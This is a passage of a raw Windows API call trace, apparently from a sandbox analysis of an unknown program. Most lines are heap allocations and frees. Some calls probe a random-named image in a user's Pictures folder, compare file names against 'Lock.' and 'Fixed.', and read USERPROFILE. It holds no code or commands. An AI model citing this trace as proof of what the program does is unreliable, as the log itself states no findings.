RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0212.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0212.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0212.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0212.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0212.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0212.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0212.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0212.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0212.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0212.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x62) returned 0x29f7900 [0212.072] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Y1E-1EvHMk4d A6QVp8.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Y1E-1EvHMk4d A6QVp8.png", lpFilePart=0x8cf650*="Y1E-1EvHMk4d A6QVp8.png") returned 0x30 [0212.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7900 | out: hHeap=0x2af0000) returned 1 [0212.072] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Y1E-1EvHMk4d A6QVp8.png" (normalized: "c:\\users\\fd1hvy\\pictures\\y1e-1evhmk4d a6qvp8.png")) returned 0xffffffff [0212.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0212.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0212.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0212.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0212.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0212.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.072] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0212.072] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.072] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0212.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0212.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0212.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0212.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0212.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0212.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0212.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0212.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0212.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0212.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yyplXweR.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yplXweR.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="plXweR.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lXweR.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XweR.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="weR.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eR.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0212.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0212.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0212.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0212.074] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0212.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0212.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0212.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0212.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1a) returned 0x2a77df0 [0212.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0212.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yyplXweR.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yplXweR.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="plXweR.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lXweR.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XweR.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="weR.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eR.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0212.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa61b0 | out: hHeap=0x2af0000) returned 1 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0212.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0212.075] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0212.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0212.075] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0212.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0212.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0212.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0212.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0212.076] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa690 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0212.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0212.076] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0212.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0212.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0212.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0212.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0212.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0212.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0212.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0212.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0212.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0212.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0212.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0212.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0212.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0212.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0212.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0212.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0212.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0212.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0212.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0212.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0212.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0212.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0212.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0212.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0212.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0212.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0212.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0212.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0212.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0212.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0212.078] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0212.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0212.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0212.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0212.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0212.078] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0212.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0212.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0212.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0212.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0212.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0212.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0212.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0212.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0212.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0212.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0212.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0212.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0212.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0212.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0212.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0212.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0212.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0212.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0212.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0212.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0212.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0212.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 